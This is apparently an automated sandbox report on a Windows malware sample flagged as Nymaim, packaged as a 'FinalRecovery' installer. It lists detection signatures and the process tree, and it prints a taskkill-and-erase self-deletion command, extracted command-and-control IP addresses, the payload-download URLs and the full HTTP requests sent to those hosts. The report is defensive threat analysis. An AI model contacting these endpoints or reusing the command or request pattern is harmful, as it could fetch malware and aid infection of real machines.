Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:791301
MD5:14e09c7a5842688842f6c0bf61c17135
SHA1:4c9e1cbcd933293268c396b3c79f3836665059a8
SHA256:a5ce2c21d3f92080a06e0aa7862303848b2661181b279a2db9b72b8f31a82702
Tags:exe
Infos:

Detection

Nymaim
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (overwrites its own PE header)
Yara detected Nymaim
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Obfuscated command line found
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Contains functionality to launch a program with higher privileges
Uses taskkill to terminate processes
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to detect sandboxes (foreground window change detection)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • file.exe (PID: 5992 cmdline: C:\Users\user\Desktop\file.exe MD5: 14E09C7A5842688842F6C0BF61C17135)
    • file.tmp (PID: 6100 cmdline: "C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp" /SL5="$4023C,1536639,54272,C:\Users\user\Desktop\file.exe" MD5: D76329B30DB65F61D55B20F36B56DA26)
      • finalrecovery.exe (PID: 6076 cmdline: "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe" MD5: 88A9155EB9D85157634ED38D128C877B)
        • cmd.exe (PID: 4488 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im "finalrecovery.exe" /f & erase "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • taskkill.exe (PID: 5968 cmdline: taskkill /im "finalrecovery.exe" /f MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
  • cleanup
{"C2 addresses": ["45.12.253.56", "45.12.253.72", "45.12.253.98", "45.12.253.75"]}
SourceRuleDescriptionAuthorStrings
00000002.00000002.323772698.0000000003250000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
    00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
      SourceRuleDescriptionAuthorStrings
      2.2.finalrecovery.exe.400000.1.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
        2.2.finalrecovery.exe.3250000.2.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
          2.2.finalrecovery.exe.3250000.2.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
            2.2.finalrecovery.exe.400000.1.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
              No Sigma rule has matched
              Timestamp:45.12.253.72192.168.2.380497082852925 01/25/23-10:02:04.044834
              SID:2852925
              Source Port:80
              Destination Port:49708
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\6tohc1clzbcir.exeReversingLabs: Detection: 60%
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeJoe Sandbox ML: detected
              Source: 1.2.file.tmp.400000.0.unpackAvira: Label: TR/Dropper.Gen
              Source: 0.3.file.exe.23675c8.1.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 1.2.file.tmp.4b375c.2.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 0.3.file.exe.218b608.5.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 1.0.file.tmp.4b375c.2.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 0.2.file.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
              Source: 2.2.finalrecovery.exe.400000.1.unpackMalware Configuration Extractor: Nymaim {"C2 addresses": ["45.12.253.56", "45.12.253.72", "45.12.253.98", "45.12.253.75"]}
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_0045C524 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_0045C5D8 ArcFourCrypt,
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_0045C5F0 ArcFourCrypt,
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_10001000 ISCryptGetVersion,
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_10001130 ArcFourCrypt,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00403770 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy,

              Compliance

              barindex
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeUnpacked PE file: 2.2.finalrecovery.exe.400000.1.unpack
              Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_00473B80 FindFirstFileA,FindNextFileA,FindClose,
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_00451DC0 FindFirstFileA,GetLastError,
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_004963A0 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_00463080 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_004634FC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_00461AF4 FindFirstFileA,FindNextFileA,FindClose,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00423DAD FindFirstFileExW,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_10007E39 FindFirstFileExW,

              Networking

              barindex
              Source: TrafficSnort IDS: 2852925 ETPRO TROJAN GCleaner Downloader - Payload Response 45.12.253.72:80 -> 192.168.2.3:49708
              Source: Malware configuration extractorIPs: 45.12.253.56
              Source: Malware configuration extractorIPs: 45.12.253.72
              Source: Malware configuration extractorIPs: 45.12.253.98
              Source: Malware configuration extractorIPs: 45.12.253.75
              Source: Joe Sandbox ViewASN Name: CMCSUS CMCSUS
              Source: Joe Sandbox ViewASN Name: CMCSUS CMCSUS
              Source: Joe Sandbox ViewIP Address: 45.12.253.72 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.56
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.56
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.56
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.56
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: finalrecovery.exe, 00000002.00000002.323596544.0000000001665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.12.253.56/advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixinte
              Source: finalrecovery.exe, 00000002.00000002.323596544.0000000001665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.12.253.72/default/puk.php
              Source: finalrecovery.exe, 00000002.00000002.323596544.0000000001665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.12.253.72/default/puk.phpk
              Source: finalrecovery.exe, 00000002.00000002.323596544.0000000001665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.12.253.72/default/stuk.php
              Source: finalrecovery.exe, 00000002.00000002.323596544.0000000001665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.12.253.72/default/stuk.phpE
              Source: finalrecovery.exe, 00000002.00000003.318212747.00000000043F3000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.257203084.00000000043F3000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.306066040.00000000043F3000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.300076163.00000000043F3000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.294050791.00000000043F3000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.263266047.00000000043F3000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000002.323950124.000000000426A000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000002.323964971.00000000043F5000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.312209473.00000000043F3000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.275530934.00000000043F3000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.281620153.00000000043F3000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.287669574.00000000043F3000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.269177811.00000000043F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.12.253.75/dll.php
              Source: finalrecovery.exe, 00000002.00000002.323950124.000000000426A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.12.253.75/dll.phpI
              Source: file.tmp, 00000001.00000003.243532631.0000000002278000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://nbafrog.com/
              Source: file.exe, 00000000.00000003.324832803.00000000020E1000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.242527892.00000000020E1000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.324490677.0000000002267000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.243532631.0000000002278000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://nbafrog.com/.
              Source: file.tmp, 00000001.00000003.324143463.0000000000782000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000002.324394304.0000000000782000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nbafrog.com/b
              Source: is-587OJ.tmp.1.drString found in binary or memory: http://www.finalrecovery.com/buy.htm
              Source: file.tmp, file.tmp, 00000001.00000000.243074612.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-U89TP.tmp.1.drString found in binary or memory: http://www.innosetup.com/
              Source: file.exe, 00000000.00000003.242613252.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.242766712.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, file.tmp, file.tmp, 00000001.00000000.243074612.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-U89TP.tmp.1.drString found in binary or memory: http://www.remobjects.com/ps
              Source: file.exe, 00000000.00000003.242613252.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.242766712.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000000.243074612.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-U89TP.tmp.1.drString found in binary or memory: http://www.remobjects.com/psU
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00401B40 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,
              Source: global trafficHTTP traffic detected: GET /advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: OKHost: 45.12.253.56Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /default/stuk.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: OKHost: 45.12.253.72Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /default/puk.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: OKHost: 45.12.253.72Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
              Source: file.exe, 00000000.00000002.324989126.0000000000638000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 2.2.finalrecovery.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.finalrecovery.exe.3250000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.finalrecovery.exe.3250000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.finalrecovery.exe.400000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.323772698.0000000003250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
              Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409420 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_00454800 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004083E4
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_00466728
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_0047EB9C
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_0046F304
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_0043D388
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_004440A8
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_0045E468
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_0045A510
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_004447A0
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_004687A0
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_00434900
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_00430B40
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_00444BAC
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_00484C90
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_00450D1C
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_00443B00
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_00485BC4
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_00433BFC
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_0048BECC
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_0042FFB4
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00404490
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00409670
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_004056A0
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00406800
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00406AA0
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00404D40
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00405F40
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00402F20
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00415053
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00415285
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00422329
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00419490
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_004267D0
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00404840
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_004109D0
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_0042AB1A
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_0040CBC0
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00421C08
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_0042AC3A
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00428CB9
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00447D2D
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00404F20
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_1000E111
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_1000FAC0
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: String function: 10003100 appears 34 times
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: String function: 0040F960 appears 54 times
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: String function: 00405964 appears 108 times
